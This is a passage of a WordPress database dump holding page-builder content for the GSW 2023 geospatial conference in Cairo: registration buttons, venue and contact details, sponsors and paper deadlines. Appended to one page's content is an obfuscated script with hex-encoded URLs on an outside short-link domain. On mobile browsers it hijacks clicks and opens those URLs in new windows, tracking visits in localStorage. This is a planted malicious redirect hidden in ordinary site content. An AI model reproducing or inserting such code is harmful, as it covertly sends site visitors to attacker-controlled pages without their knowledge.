offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:57:16','2023-04-02 01:57:16','',3066,'https://gsw2023.com/?p=3998',0,'revision','',0),
(3999,1,'2023-04-02 01:57:35','2023-04-02 01:57:35','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400393668{margin-top: 125px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400344244{margin-top: 95px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400550419{margin-top: 125px !important;}\"]</p>\n<h6></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400614804{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h3>\n<p><img class=\"alignnone size-medium wp-image-3997 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400628059{margin-top: 95px !important;}\"]&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px 